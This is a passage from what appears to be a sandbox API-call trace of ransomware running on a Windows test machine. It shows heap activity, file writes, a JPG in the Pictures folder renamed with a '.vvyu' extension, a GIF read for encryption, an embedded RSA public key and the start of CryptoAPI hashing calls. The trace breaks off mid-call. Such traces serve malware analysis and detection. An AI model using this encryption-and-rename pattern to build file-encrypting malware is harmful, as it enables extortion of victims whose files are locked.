[0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38be0 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c28 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.388] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396d0 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.391] GetCurrentThreadId () returned 0x264 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37be8 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.392] GetCurrentThreadId () returned 0x264 [0187.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b4c8 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3b6e0 [0187.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b4c8 | out: hHeap=0x6a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b6e0 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38c28 | out: hHeap=0x6a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.403] WriteFile (in: hFile=0x584, lpBuffer=0x2d3a670*, nNumberOfBytesToWrite=0xe4a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d3a670*, lpNumberOfBytesWritten=0x30ffb14*=0xe4a, lpOverlapped=0x0) returned 1 [0187.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0187.403] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe4f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.403] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.405] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.405] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.405] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.405] CloseHandle (hObject=0x584) returned 1 [0187.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.407] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\lv6DMrgKbM_9C6x.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv6dmrgkbm_9c6x.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\lv6DMrgKbM_9C6x.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv6dmrgkbm_9c6x.jpg.vvyu")) returned 1 [0187.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.418] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.436] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e7ff40, ftCreationTime.dwHighDateTime=0x1d89e6a, ftLastAccessTime.dwLowDateTime=0xc88c1aa0, ftLastAccessTime.dwHighDateTime=0x1d8a3db, ftLastWriteTime.dwLowDateTime=0xc88c1aa0, ftLastWriteTime.dwHighDateTime=0x1d8a3db, nFileSizeHigh=0x0, nFileSizeLow=0x1746e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ncx1xStIYX_cZWb.gif", cAlternateFileName="NCX1XS~1.GIF")) returned 1 [0187.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38c28 [0187.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38c28 | out: hHeap=0x6a0000) returned 1 [0187.436] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ncx1xStIYX_cZWb.gif") returned=".gif" [0187.437] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ncx1xStIYX_cZWb.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncx1xstiyx_czwb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.443] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=95342) returned 1 [0187.443] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.446] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17448, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.446] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.449] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.449] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1746e, lpOverlapped=0x0) returned 1 [0187.450] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.450] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.451] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.452] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: 